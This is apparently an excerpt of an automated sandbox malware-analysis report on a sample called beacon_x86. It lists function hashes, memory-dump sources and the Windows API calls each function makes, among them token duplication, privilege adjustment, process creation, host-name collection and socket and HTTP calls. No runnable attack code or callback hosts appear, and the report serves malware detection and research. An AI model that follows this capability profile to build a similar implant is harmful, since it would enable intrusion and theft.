          • Instruction ID: dfdd8007c65dc1328c8f9c6bea9d3076d2f2b7e45365318cd2d6494bd31ab66c
          • Opcode Fuzzy Hash: 955326eee837c9f927e054387bf5b9ddf14571f0630fd128837ef7ecf955bbd9
          • Instruction Fuzzy Hash: DE114CB0A21205EFCF18CF55EC699BA3B69EB15745F14502AE486C2310DB30BA44CB31
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID:
          • String ID: $<$abcdefghijklmnop$abcdefghijklmnop
          • API String ID: 0-3339112986
          • Opcode ID: 4f3e4aa69f00bf35dabbf4cf9034c8cc60d7e660268ef8f9a4463fa9815f5d53
          • Instruction ID: ac09b5002e7ed4c692e02336b23558f09c9701877855a033f6dc5f1b203f05ca
          • Opcode Fuzzy Hash: 4f3e4aa69f00bf35dabbf4cf9034c8cc60d7e660268ef8f9a4463fa9815f5d53
          • Instruction Fuzzy Hash: 9352E275E102198FDB08CF69C491AADBBF1EF4D310F14C16AE869AB352C234E951CFA4
          APIs
          • GetModuleHandleA.KERNEL32(00000000), ref: 00D612C8
          • LoadLibraryA.KERNEL32(00000000), ref: 00D612D3
          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00D612DB
            • Part of subcall function 00D616E2: _vswprintf_s.LIBCMT ref: 00D616FE
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: AddressHandleLibraryLoadModuleProc_vswprintf_s
          • String ID:
          • API String ID: 2092861438-0
          • Opcode ID: c6a89f95465e4311d95137f2b1f914ea95354d56fd0a7841555270d50992e9a9
          • Instruction ID: 425c8e3b314130801b71c0bbd92a696c2a7b80a5d29b77ca2ceb1b27bb6735d1
          • Opcode Fuzzy Hash: c6a89f95465e4311d95137f2b1f914ea95354d56fd0a7841555270d50992e9a9
          • Instruction Fuzzy Hash: 7D41197A9041009BDF14DFE4D49AA6B37B9EB88320F7D4055EA06EF381D634DC4287B8
          APIs
          • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 00D63227
          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00D6324A
          • GetLastError.KERNEL32 ref: 00D63254
            • Part of subcall function 00D60825: _vwprintf.LIBCMT ref: 00D6082F
            • Part of subcall function 00D60825: _vswprintf_s.LIBCMT ref: 00D60853
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue_vswprintf_s_vwprintf
          • String ID:
          • API String ID: 2004037343-0
          • Opcode ID: 9f86f87c5ae15c194252f1bfe404f2ae1e395c140dd38bd226f374757407943b
          • Instruction ID: f48a8e83ef0a784304218b222b8b5388bcf30a4cd1d0259e0b5ef523995feb60
          • Opcode Fuzzy Hash: 9f86f87c5ae15c194252f1bfe404f2ae1e395c140dd38bd226f374757407943b
          • Instruction Fuzzy Hash: 99111A72900219BBEB119FA9DD45AEFBBBCEF08354F100426F904E6151E635AE0886B6
          APIs
          • CreateProcessAsUserA.ADVAPI32(00D9F8A4,00000000,?,00000000,00000000,00000001,00000004,00000000,00000000,?,?,?,?,00000011,00D63B75,?), ref: 00D63AA4
            • Part of subcall function 00D63870: _memset.LIBCMT ref: 00D6389E
            • Part of subcall function 00D63870: _memset.LIBCMT ref: 00D638BA
          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000004,00000000,00000000,?,?,?,?,00000011,00D63B75,?,?), ref: 00D63AF3
          • GetLastError.KERNEL32(?,?,00D68320), ref: 00D63AFD
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: CreateProcess_memset$ErrorLastUser
          • String ID:
          • API String ID: 4202367947-0
          • Opcode ID: 0982fd34417c59dd49dc118b61c43cf33fa052bbbe8de61657e7a272f20c38e9
          • Instruction ID: 7e6f0e59f3316c0ce858a71bda69231b958666f67762f759dd2f86ce17d9c5f8
          • Opcode Fuzzy Hash: 0982fd34417c59dd49dc118b61c43cf33fa052bbbe8de61657e7a272f20c38e9
          • Instruction Fuzzy Hash: 5711FA35110640BFEB325FA6DC48E277BB9EF85B11B28082EF586C1560D7268550EB31
          APIs
          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,00D8A094,?,?,?,00D670ED), ref: 00D6D475
          • CheckTokenMembership.ADVAPI32(00000000,?,00D670ED,?,?,?,00D670ED), ref: 00D6D48A
          • FreeSid.ADVAPI32(?,?,?,?,00D670ED), ref: 00D6D49A
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: AllocateCheckFreeInitializeMembershipToken
          • String ID:
          • API String ID: 3429775523-0
          • Opcode ID: 1d6f8c9cadea20f816400e59006557ca8d84ccf6ab4b4ccf15bb49df28ab8954
          • Instruction ID: 46fdceb7e08d21928fd7f4995a7b47aeea4566b695badea2ae4f02092e85a38a
          • Opcode Fuzzy Hash: 1d6f8c9cadea20f816400e59006557ca8d84ccf6ab4b4ccf15bb49df28ab8954
          • Instruction Fuzzy Hash: 90011D72D45288FFEB01DBE89C84ADDBFBCAB14204F44449AA501A3245D2706B08DB36
          APIs
          • DeleteProcThreadAttributeList.KERNELBASE(00D6834A), ref: 00D681C8
          • GetProcessHeap.KERNEL32(00000000,00D6834A,?,00D6834A,00000000), ref: 00D681D3
          • HeapFree.KERNEL32(00000000,?,00D6834A,00000000), ref: 00D681DA
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: Heap$AttributeDeleteFreeListProcProcessThread
          • String ID:
          • API String ID: 551783810-0
          • Opcode ID: e8dc1fe84768dd7c4b5017b534baf21f3adb7088137c2998dde32ade6aef6991
          • Instruction ID: 57042abf33176543147232374795c4d67c85a0f18c667b872bfd1e8256d85333
          • Opcode Fuzzy Hash: e8dc1fe84768dd7c4b5017b534baf21f3adb7088137c2998dde32ade6aef6991
          • Instruction Fuzzy Hash: E9C00232054348FFEF012FE9EC0DA897F29EB09692F008112F70DC5265CB729554ABB2
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 69f878c662c84c756de1d8129119de73835064633f44cc5b8cc2bd9adefc1d0d
          • Instruction ID: c2f0cb761ec17cff96f8be3869eb4dba53266de6543573250203317dd1cbea0d
          • Opcode Fuzzy Hash: 69f878c662c84c756de1d8129119de73835064633f44cc5b8cc2bd9adefc1d0d
          • Instruction Fuzzy Hash: D81281319201598FDB08CF5DD891ABDBBF1EF4A311F44816EE456EB386CA38E611DB60
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 109b8e85eca6f3dc4a9b36f80e273022e8c05d9b1d1f4b328c1160f0ce62a6bb
          • Instruction ID: a59a0fc22ddfc96f205cddbf139fc72cbb10b6f657a9334a222e45671a3b463d
          • Opcode Fuzzy Hash: 109b8e85eca6f3dc4a9b36f80e273022e8c05d9b1d1f4b328c1160f0ce62a6bb
          • Instruction Fuzzy Hash: 0B1240719242598FCB08CF6DD8919BDBBF1EF49300F55816EE496EB382C638E611DB60
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
          • Instruction ID: 63142024dee99eb8ebd9e6e6d5ce4565bb0219feb4c61a6e7e65127a6a8e61aa
          • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
          • Instruction Fuzzy Hash: 8ED160B3C0F9F3068775912D416822BEA626FD1A5131FC3E1DCD43F289D62A9E1497E0
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
          • Instruction ID: e74cdac42d4d356d687a46b8e05b18258ec989895bfdb940aead44cb54f90989
          • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
          • Instruction Fuzzy Hash: B6D17FB3C0E9F30A8735912D455813BEAA2AFD1B5131FC3E19CD43F289D66A9E1097E0
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
          • Instruction ID: 1cd25fa238fa83536e2cee0a651a46d03f37c57b0810418b67913f3dd0556d1b
          • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
          • Instruction Fuzzy Hash: EAC14FB3C0E9F30A8736912D415822BEA626FD1B5131FC3E19CD43F28AD66A5E1497E0
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
          • Instruction ID: d72d78773b4044e77881f7b666d9934736528951c73e52dde7659f6623ab7369
          • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
          • Instruction Fuzzy Hash: 60C150B3D1E9F34A8736912D415813BEE62AFD1B4031FC7A19CD83F289D52A9E1497E0
          Memory Dump Source
          • Source File: 00000000.00000003.2049538044.0000000000D20000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_3_d20000_beacon_x86.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 0a7232b9ed9669d881f4893b4c8615f0ca151278e9e7f5d9bb8b2fa9bed21a24
          • Instruction ID: 3bd05013bad52864cbf34d9ce3b2ef8bf777548a8b523da455bd9dc1a639f287
          • Opcode Fuzzy Hash: 0a7232b9ed9669d881f4893b4c8615f0ca151278e9e7f5d9bb8b2fa9bed21a24
          • Instruction Fuzzy Hash: 6591CEB4E00219CFCF08CF89D5909AEBBB1FF58314F249199D8156B315D235AA41CFA6
          Memory Dump Source
          • Source File: 00000000.00000003.2049538044.0000000000D20000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_3_d20000_beacon_x86.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 0a7232b9ed9669d881f4893b4c8615f0ca151278e9e7f5d9bb8b2fa9bed21a24
          • Instruction ID: 5ea41cd3132483dd76c1b94bbbf563adffe585470754e7300e301a4603567543
          • Opcode Fuzzy Hash: 0a7232b9ed9669d881f4893b4c8615f0ca151278e9e7f5d9bb8b2fa9bed21a24
          • Instruction Fuzzy Hash: 9491D0B4E00219DFCF08CF89D5909ADBBB1FF58305F248199D8116B315D335AA81DFA6
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _malloc
          • String ID:
          • API String ID: 1579825452-0
          • Opcode ID: 6791e407721d225b3afd7da43f316009bd61b4b06dee7acae203e02b51795d3a
          • Instruction ID: 72ff2f11026f94b6e7c2b73bcc5123fb980c2a18e3b5267b3406511484b2eb62
          • Opcode Fuzzy Hash: 6791e407721d225b3afd7da43f316009bd61b4b06dee7acae203e02b51795d3a
          • Instruction Fuzzy Hash: D6413CB6E00209AFDB14DFA8C881AAEB7B5EF48310F158569E909E7345E774ED05CB60
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 889514d21c04973c4f53551dec79e456587bb55b0ebe03bb6a4b0c62d7c4914a
          • Instruction ID: ef24fa0c7c192093a52d7bf4de30f07dc8bf9996205d8966295a27bae4609557
          • Opcode Fuzzy Hash: 889514d21c04973c4f53551dec79e456587bb55b0ebe03bb6a4b0c62d7c4914a
          • Instruction Fuzzy Hash: 7441A1749201688FCB48CF9EE8908EDBBF2FB4E351B45851AE546B7395C638A910DF34
          APIs
          • htonl.WS2_32(00D9F838), ref: 00D67B54
          • select.WS2_32(00000000,?,?,?,?), ref: 00D67BB8
          • __WSAFDIsSet.WS2_32(?,?), ref: 00D67BD4
          • accept.WS2_32(?,00000000,00000000), ref: 00D67BE9
          • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 00D67BFC
            • Part of subcall function 00D67520: _malloc.LIBCMT ref: 00D67527
            • Part of subcall function 00D67520: GetTickCount.KERNEL32 ref: 00D67547
            • Part of subcall function 00D606CB: _malloc.LIBCMT ref: 00D606D1
            • Part of subcall function 00D6071B: htonl.WS2_32(00000000), ref: 00D60721
            • Part of subcall function 00D60864: _memset.LIBCMT ref: 00D60872
          • __WSAFDIsSet.WS2_32(?,?), ref: 00D67C89
          • accept.WS2_32(?,00000000,00000000), ref: 00D67C9B
          • closesocket.WS2_32(00000002), ref: 00D67DA9
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _mallocaccepthtonl$CountTick_memsetclosesocketioctlsocketselect
          • String ID: d
          • API String ID: 4083423528-2564639436
          • Opcode ID: cb1bd422f49ec1641cc3d4f92a6d39acd7681f861dd122451e90aa1d8bf74031
          • Instruction ID: 7b6f05ec95234217fc4f771b1ca73a45e120cb6f074de26abf8d8f47f370173a
          • Opcode Fuzzy Hash: cb1bd422f49ec1641cc3d4f92a6d39acd7681f861dd122451e90aa1d8bf74031
          • Instruction Fuzzy Hash: 607128B1C00608EBDB21EFA4CC45AAFBBB8EF44314F1449AAE555E2251E731EA45CF71
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _write_multi_char$_write_string$__aulldvrm__cftof
          • String ID: $-$@$g
          • API String ID: 4131014116-2320099971
          • Opcode ID: 09abb725da79724107c97555dae2b3c844d34ba5ec8dfada0ed46c5d5eb82f1e
          • Instruction ID: e374d635a8242bbac06bdebc93a0f79552487a724ecb65f76d84354a9ce1e248
          • Opcode Fuzzy Hash: 09abb725da79724107c97555dae2b3c844d34ba5ec8dfada0ed46c5d5eb82f1e
          • Instruction Fuzzy Hash: 76F1577180522D9ADB309F18CC887EDBBB5EB54328F1882DAD44CA6192E7748FC5CF61
          APIs
          • _strlen.LIBCMT ref: 00D7AED1
          • __malloc_crt.LIBCMT ref: 00D7AFDD
            • Part of subcall function 00D8080D: _malloc.LIBCMT ref: 00D80819
            • Part of subcall function 00D8080D: Sleep.KERNEL32(00000000,00000001,?,?,00D79834,00000018,00D92700,0000000C,00D798C5,?,?,?,00D8519D,00000004,00D92A60,0000000C), ref: 00D8082E
          • __decode_pointer.LIBCMT ref: 00D7B054
          • __decode_pointer.LIBCMT ref: 00D7B083
          • __decode_pointer.LIBCMT ref: 00D7B0A8
          • _write_multi_char.LIBCMT ref: 00D7B323
          • _write_string.LIBCMT ref: 00D7B343
          • _write_multi_char.LIBCMT ref: 00D7B365
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: __decode_pointer$_write_multi_char$Sleep__malloc_crt_malloc_strlen_write_string
          • String ID: -$@$g
          • API String ID: 785859804-2189933660
          • Opcode ID: 808e18b60f291b9fdfe502dbf34f99d7ad1d900eb6831da42885eb4605a8ed39
          • Instruction ID: 867de4a000729e71d0075abeb52140f79b60fce9dbf3034e4579c09ac09a38fe
          • Opcode Fuzzy Hash: 808e18b60f291b9fdfe502dbf34f99d7ad1d900eb6831da42885eb4605a8ed39
          • Instruction Fuzzy Hash: 3FC1447180522D9ADB309F18CC887EDBBB5EB54328F1882DAD44CA6152EB758FC5CF61
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: __decode_pointer$_write_multi_char$_strlen_write_string
          • String ID: -$@$g
          • API String ID: 4088299054-2189933660
          • Opcode ID: 1ae129bfee6254c9a5e3658857fb8c4933a575d7979b7fdbbc0ef0e7e15a441b
          • Instruction ID: fd3b2b208220292a6b53199d08332862300fa353751a53beff188c9d5c96e156
          • Opcode Fuzzy Hash: 1ae129bfee6254c9a5e3658857fb8c4933a575d7979b7fdbbc0ef0e7e15a441b
          • Instruction Fuzzy Hash: C1C1557180522D9ADF309E18CC887ADBBB5EB54328F1882DAD44CA6152EB758FC5CF61
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: __snprintf$_memset$HttpRequest$OpenSendSleep
          • String ID:
          • API String ID: 211597586-0
          • Opcode ID: 9391b8f4c8343b7f261005d4aed2972c0e1366ed12449fac3dc339d81a15aa81
          • Instruction ID: e44ac3938db7a716fc53a53a08ed9f32e139763866e758f66c9455400d855fe2
          • Opcode Fuzzy Hash: 9391b8f4c8343b7f261005d4aed2972c0e1366ed12449fac3dc339d81a15aa81
          • Instruction Fuzzy Hash: 21618272900219AFDB11EFA4DC45EEE7BBDEF05304F0804A6F605E3162EB359A498B75
          APIs
          • _memset.LIBCMT ref: 00D6C17F
            • Part of subcall function 00D6BF6B: _memset.LIBCMT ref: 00D6BFFE
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _memset
          • String ID: 0-v$0.v$0/v$@Cv$P.v$`+v$p,v$p=v
          • API String ID: 2102423945-2623314928
          • Opcode ID: 2a1ddd4c431b777eebf149a5e467cff022968bc0af4edfeb5626e099c1d7a3ef
          • Instruction ID: a3a6c6d33edf21e2f03e9201f63ac6a42c5adfb9ff06de3ac0bdf3e68bb77c96
          • Opcode Fuzzy Hash: 2a1ddd4c431b777eebf149a5e467cff022968bc0af4edfeb5626e099c1d7a3ef
          • Instruction Fuzzy Hash: 8F416D36A291286BC711E629CD42CFA76BCDF46720F4511B3B08DB3252EA749F454EF0
          APIs
          • select.WS2_32(00000000,00000000,?,?,00000000), ref: 00D67975
          • __WSAFDIsSet.WS2_32(?,?), ref: 00D67985
          • __WSAFDIsSet.WS2_32(?,?), ref: 00D67998
          • gethostbyname.WS2_32(?), ref: 00D679AC
          • htons.WS2_32(?), ref: 00D679BF
          • inet_addr.WS2_32(?), ref: 00D679CB
          • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 00D679E5
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: gethostbynamehtonsinet_addrselectsendto
          • String ID: d
          • API String ID: 3731482772-2564639436
          • Opcode ID: 7eda4c1a0149a1f0705f0d554761037a737f0056b7dbc266c3fbf94893ed4ac9
          • Instruction ID: a0b1445368e4dc9736521aab4d4d4c7207b0d648437b7238f7aa6959d930b5c0
          • Opcode Fuzzy Hash: 7eda4c1a0149a1f0705f0d554761037a737f0056b7dbc266c3fbf94893ed4ac9
          • Instruction Fuzzy Hash: 8421497290431DABEF11AFA4DC45BEE7BB9EF08310F1000A7EA04E6191E675DA518FA1
          APIs
            • Part of subcall function 00D671BC: _malloc.LIBCMT ref: 00D671C2
            • Part of subcall function 00D671BC: _malloc.LIBCMT ref: 00D671D2
          • _memset.LIBCMT ref: 00D6B3CE
            • Part of subcall function 00D6B7BA: _memset.LIBCMT ref: 00D6B8B6
          • _malloc.LIBCMT ref: 00D6B3E1
            • Part of subcall function 00D777FF: __FF_MSGBANNER.LIBCMT ref: 00D77822
            • Part of subcall function 00D777FF: __NMSG_WRITE.LIBCMT ref: 00D77829
            • Part of subcall function 00D777FF: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,00D9EFA0,?,00D6006E,00004008), ref: 00D77876
          • _memset.LIBCMT ref: 00D6B3F3
            • Part of subcall function 00D6DA37: _malloc.LIBCMT ref: 00D6DA5E
            • Part of subcall function 00D6DA37: _memset.LIBCMT ref: 00D6DA8C
          • htonl.WS2_32(00000000), ref: 00D6B424
          • GetComputerNameExA.KERNEL32(00000006,?,?), ref: 00D6B495
          • GetComputerNameA.KERNEL32(?,?), ref: 00D6B4C6
          • GetUserNameA.ADVAPI32(?,?), ref: 00D6B4F7
            • Part of subcall function 00D61F1B: WSASocketA.WS2_32(00000002,00000002,00000000,00000000,00000000,00000000), ref: 00D61F3F
          • _malloc.LIBCMT ref: 00D6B5CF
          • _memset.LIBCMT ref: 00D6B661
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _malloc_memset$Name$Computer$AllocateHeapSocketUserhtonl
          • String ID:
          • API String ID: 932012179-0
          • Opcode ID: 9832f672541c47644c593ca086c20e1186808bbf93a0e041c8a06648b5b8eedf
          • Instruction ID: 0da9baa8ca7cf8c642e0889820611ca07445d9a374f392e0005e78acf8909f74
          • Opcode Fuzzy Hash: 9832f672541c47644c593ca086c20e1186808bbf93a0e041c8a06648b5b8eedf
          • Instruction Fuzzy Hash: FD8106729083046BD720EB65DC42B6B77E9EF88734F14481BF588DB282DB75D98487B2
          APIs
          • htonl.WS2_32 ref: 00D6D13C
          • htonl.WS2_32(?), ref: 00D6D14C
          • GetLastError.KERNEL32 ref: 00D6D176
          • OpenProcessToken.ADVAPI32(00000000,00000000,00000008), ref: 00D6D19A
          • GetLastError.KERNEL32 ref: 00D6D1A4
          • GetLastError.KERNEL32 ref: 00D6D1C9
          • DuplicateTokenEx.ADVAPI32(00000008,02000000,00000000,00000003,00000001,00D9F8A4), ref: 00D6D1E8
          • GetLastError.KERNEL32 ref: 00D6D1F2
          • GetLastError.KERNEL32 ref: 00D6D20A
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: ErrorLast$Tokenhtonl$DuplicateOpenProcess
          • String ID:
          • API String ID: 2561675318-0
          • Opcode ID: 07b152f6cf037b5dcaace30ce36194c9710746e331e3ff0547eff56f042388b3
          • Instruction ID: 59bbd3a93ed36e2c1db2ae1d9e2cf904a7460eb8959e8b71864cffbf61ad8960
          • Opcode Fuzzy Hash: 07b152f6cf037b5dcaace30ce36194c9710746e331e3ff0547eff56f042388b3
          • Instruction Fuzzy Hash: A7319171E00305BBFB206BA5EC49F7A3BAAEF45755F284026F641E6191DAB8C904CB31
          APIs
          • htonl.WS2_32 ref: 00D67767
          • htons.WS2_32(00000000), ref: 00D67778
          • socket.WS2_32(00000002,00000001,00000000), ref: 00D677B1
          • closesocket.WS2_32(00000000), ref: 00D677C0
          • gethostbyname.WS2_32(00000000), ref: 00D677DE
          • htons.WS2_32(?), ref: 00D6780A
          • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 00D6781D
          • connect.WS2_32(00000000,?,00000010), ref: 00D6782E
          • WSAGetLastError.WS2_32(00000000,?,00000010), ref: 00D67837
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: htons$ErrorLastclosesocketconnectgethostbynamehtonlioctlsocketsocket
          • String ID:
          • API String ID: 3339321253-0
          • Opcode ID: acb0ef915856d060e224ddedd22c6cddc1c7e23316138617e6aa7c54753255e7
          • Instruction ID: 67d5ace5a47ceb3261aaad7fc4cf24162d22832c8b426ca2fba37f054ad46662
          • Opcode Fuzzy Hash: acb0ef915856d060e224ddedd22c6cddc1c7e23316138617e6aa7c54753255e7
          • Instruction Fuzzy Hash: 8631C5B5D04118ABDB20BBE49C85FBE77ACEF08328F1401A6F944E7142E674CA0587B9
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.3890235844.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.3890220060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890251384.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890265739.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890295487.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890310517.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_beacon_x86.jbxd
          Similarity
          • API ID: Virtual$ErrorLastProtectQueryabortfwritevfprintf
          • String ID: @
          • API String ID: 1616349570-2766056989
          • Opcode ID: 1b0efd051e5881cbe3a5a53f7e2a4386ccc2b94af93b62ca0e5c5b9780880a0d
          • Instruction ID: 2f91aa6c44690fe53a7d4d9a4cebfbeb7542b51ecc99335da346757be2dbd23f
          • Opcode Fuzzy Hash: 1b0efd051e5881cbe3a5a53f7e2a4386ccc2b94af93b62ca0e5c5b9780880a0d
          • Instruction Fuzzy Hash: 2D415EB59043019FD700EF29D98565AFBE0FF84354F45893EE888973A1D778E844CB9A
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.3890235844.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.3890220060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
